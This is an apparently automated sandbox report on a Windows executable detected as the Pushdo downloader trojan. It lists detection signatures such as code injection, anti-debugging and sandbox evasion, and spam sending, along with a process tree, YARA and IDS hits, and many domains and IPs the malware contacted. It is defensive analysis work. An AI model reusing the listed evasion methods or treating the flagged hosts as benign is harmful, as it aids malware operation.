Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CX17SY6xF6.exe

Overview

General Information

Sample Name:CX17SY6xF6.exe
Original Sample Name:db47df7cf51747e533c968da7452f1ce6d20f465d7fcd6e2eac559266ac3e9ed.exe
Analysis ID:1281452
MD5:ca67c9c17a701b0664b90de372acdfb1
SHA1:8d7e388b5d276816279ef37e7cab9cd554251737
SHA256:db47df7cf51747e533c968da7452f1ce6d20f465d7fcd6e2eac559266ac3e9ed
Tags:exe
Infos:

Detection

Pushdo
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Backdoor Pushdo
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Snort IDS alert for network traffic
Writes to foreign memory regions
Found stalling execution ending in API Sleep call
Machine Learning detection for sample
Injects a PE file into a foreign processes
Send many emails (e-Mail Spam)
Contains functionality to inject code into remote processes
Machine Learning detection for dropped file
Drops PE files to the user root directory
Contains functionality to inject threads in other processes
Tries to resolve many domain names, but no domain seems valid
Contains functionality to compare user and computer (likely to detect sandboxes)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Connects to many different domains
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Connects to several IPs in different countries
Uses SMTP (mail sending)
Found evasive API chain (may stop execution after accessing registry keys)
Drops PE files to the user directory
Creates or modifies windows services
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • CX17SY6xF6.exe (PID: 6512 cmdline: C:\Users\user\Desktop\CX17SY6xF6.exe MD5: CA67C9C17A701B0664B90DE372ACDFB1)
    • svchost.exe (PID: 5172 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 3864 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 4112 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 4092 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 5768 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
    • svchost.exe (PID: 21840 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • pigalicapi.exe (PID: 2408 cmdline: "C:\Users\user\pigalicapi.exe" MD5: CA67C9C17A701B0664B90DE372ACDFB1)
    • svchost.exe (PID: 632 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 21288 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 22764 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 22800 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 22940 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • pigalicapi.exe (PID: 6996 cmdline: "C:\Users\user\pigalicapi.exe" MD5: CA67C9C17A701B0664B90DE372ACDFB1)
    • svchost.exe (PID: 23432 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
PushdoPushdo is usually classified as a "downloader" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.863723197.0000000001500000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
    00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
      00000000.00000002.860363475.0000000000D60000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
        SourceRuleDescriptionAuthorStrings
        4.2.pigalicapi.exe.ec0000.1.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
          4.2.pigalicapi.exe.ec0000.1.raw.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
            16.2.svchost.exe.4000000.6.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
              3.2.pigalicapi.exe.1500000.1.raw.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                0.2.CX17SY6xF6.exe.d60000.1.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                  Click to see the 5 entries
                  No Sigma rule has matched
                  Timestamp:192.168.2.4188.114.96.749694802016867 07/27/23-21:52:20.127901
                  SID:2016867
                  Source Port:49694
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: CX17SY6xF6.exeReversingLabs: Detection: 28%
                  Source: CX17SY6xF6.exeVirustotal: Detection: 34%Perma Link
                  Source: http://gpthink.com/product/204.htmlAvira URL Cloud: Label: malware
                  Source: http://www.stajum.com/NAvira URL Cloud: Label: malware
                  Source: http://www.credo.edu.pl/mAvira URL Cloud: Label: malware
                  Source: http://www.credo.edu.pl/Avira URL Cloud: Label: malware
                  Source: http://www.stajum.com/VAvira URL Cloud: Label: malware
                  Source: https://www.aevga.com/Avira URL Cloud: Label: malware
                  Source: http://www.valselit.com/177-appartement-a-vendre-sigean-30378Avira URL Cloud: Label: malware
                  Source: http://www.credo.edu.pl/0Avira URL Cloud: Label: malware
                  Source: webways.comVirustotal: Detection: 7%Perma Link
                  Source: C:\Users\user\pigalicapi.exeReversingLabs: Detection: 28%
                  Source: CX17SY6xF6.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\pigalicapi.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC8A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,4_2_00EC8A70
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC8800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,4_2_00EC8800
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC47F0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,4_2_00EC47F0
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC4BA0 CoInitialize,SetEvent,WaitForSingleObject,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetCurrentThreadId,GetSystemMetrics,GetSystemMetrics,GlobalMemoryStatus,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,wsprintfA,CryptBinaryToStringA,MultiByteToWideChar,VirtualFree,EnterCriticalSection,VirtualAlloc,VirtualAlloc,GetTickCount,VirtualFree,LeaveCriticalSection,VirtualFree,VirtualFree,VirtualFree,VirtualFree,CoUninitialize,4_2_00EC4BA0
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC8BB0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,4_2_00EC8BB0
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC8970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,4_2_00EC8970
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC8CF0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,4_2_00EC8CF0
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC4880 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,4_2_00EC4880

                  Compliance

                  barindex
                  Source: C:\Users\user\pigalicapi.exeUnpacked PE file: 3.2.pigalicapi.exe.1500000.1.unpack
                  Source: CX17SY6xF6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.4:50118 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.7:443 -> 192.168.2.4:50138 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.4:50157 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.4:50141 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.4:50130 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.48.207:443 -> 192.168.2.4:50167 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.193.133:443 -> 192.168.2.4:50200 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.4:50204 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.4:50214 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.4:50212 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.4:50213 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.4:50215 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.4:52616 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.4:54016 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.4:56895 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.7:443 -> 192.168.2.4:57238 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.4:57325 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.4:57433 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.4:57464 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.4:57472 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.4:57723 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.4:57738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.193.133:443 -> 192.168.2.4:59014 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.4:59205 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.4:59402 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.4:59546 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.4:59641 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.4:21182 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.4:21191 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.48.207:443 -> 192.168.2.4:21205 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.4:21213 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.4:21227 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.4:21253 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.7:443 -> 192.168.2.4:21258 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.4:21263 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.193.133:443 -> 192.168.2.4:21267 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.4:21273 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.4:21287 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.4:21297 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.4:21331 version: TLS 1.2
                  Source: CX17SY6xF6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010E1989 FindFirstFileExW,0_2_010E1989
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010E5EA0 FindFirstFileA,0_2_010E5EA0
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00F01989 FindFirstFileExW,3_2_00F01989
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00F05EA0 FindFirstFileA,3_2_00F05EA0

                  Networking

                  barindex
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: impexnc.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: webways.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dayvo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: enguita.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dataform.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shteeble.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kallman.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.69.139.150 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nt-hat.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.74.184.61 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gphpedit.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 107.180.58.31 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.55.214 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: avse.hu
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.143.194.23 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.189.171.125 443
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.229.22.126 443
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: notis.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.39.75.157 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nts-web.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: willsub.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shesfit.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.74.161.133 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: multip.hu
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.226.70.66 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: tcpoa.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.248.169.48 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dog-jog.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 37.59.243.164 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kamptal.at
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.19.254.22 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bd-style.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.177.137.32 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.163.45.187 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: zupraha.cz
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.30.14 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: muhr-soehne.de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.30.60.158 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.99.226.184 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.180.178 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 88.86.118.82 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aiolos-sa.gr
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gmail-smtp-in.l.google.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fdlymca.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: assideum.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bidroll.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.122.170.171 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: karmy.com.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vdoherty.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ncn.de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.159.3.117 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: komie.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftmobile.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.124.76.247 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: onzcda.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sledsport.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: tbvlugus.nl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pellys.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.19.218.80 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: semuk.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: tozzhin.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.96.252.188 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.airmail.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: lyto.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: websy.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: 106west.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ruzee.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.230.63.107 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.145 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nblewis.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: amba-tc.si
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.144 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxs.mail.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: averwin.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 211.13.196.162 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 141.193.213.20 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: chzko.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: themark.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: clysma.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ossir.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 213.186.33.16 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-kami.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: scintel.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.230.93.218 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kewlmail.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: flamingorecordings.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: actmin.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bount.com.tw
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.70.75 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bosado.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pers.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 136.243.147.81 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: angework.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail7.digitalwaves.co.nz
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 151.101.130.159 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.88 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.42.191.40 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: reproar.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hes.pt
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.94.254.88 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 127.0.0.11 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 221.132.33.88 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: portoccd.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 162.241.233.114 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: avc.com.sa
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cnti.krsn.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.145.148 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.194.190.151 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 128.204.134.138 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.94.166.30 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ultibax.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dspears.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bggs.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: unicus.jp
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cyclad.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: clinicasanluis.com.co
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: michiana.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludomemo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: umcor.am
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pccj.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ssm.ch
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wvs-net.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.fnw.us
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 108.170.12.50 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.205.126.33 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: adeesa.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.synetik.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.248.97.36 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sjbmw.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: strazynski.pl
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.120.34.73 443
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.231.184.124 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.38 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: amerifor.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gujarat.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ifesnet.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.29.72 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vfcindia.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aoinko.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpwpb.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: yoruksut.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.149.134.32 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rtcasey.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gydrozo.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: n23china.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hamaker.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sigtoa.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.125.38.187 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.161.136.188 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: refintl.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sidepath.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: listel.co.jp
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: karila.fr
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.142.173 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.se
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: zemarmot.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.15.134.44 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.237.66.112 443
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: samtv.ro
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: calvinly.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: techtrans.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kavram.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pcoyuncu.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: webavant.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.172.28.187 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: koz1.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: yasuma.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.94.41.167 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.96.32.254 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: 4locals.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.221.29 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: johnlyon.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 65.52.128.33 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.18.40.43 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.13 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.91.197.46 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: from30ty.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.8.8.200 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.76.27.77 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bigzz.by
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vonparis.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.179 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.10.34 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: x96.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: envogen.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nlcv.bas.bg
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: com-edit.fr
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 135.125.108.170 80
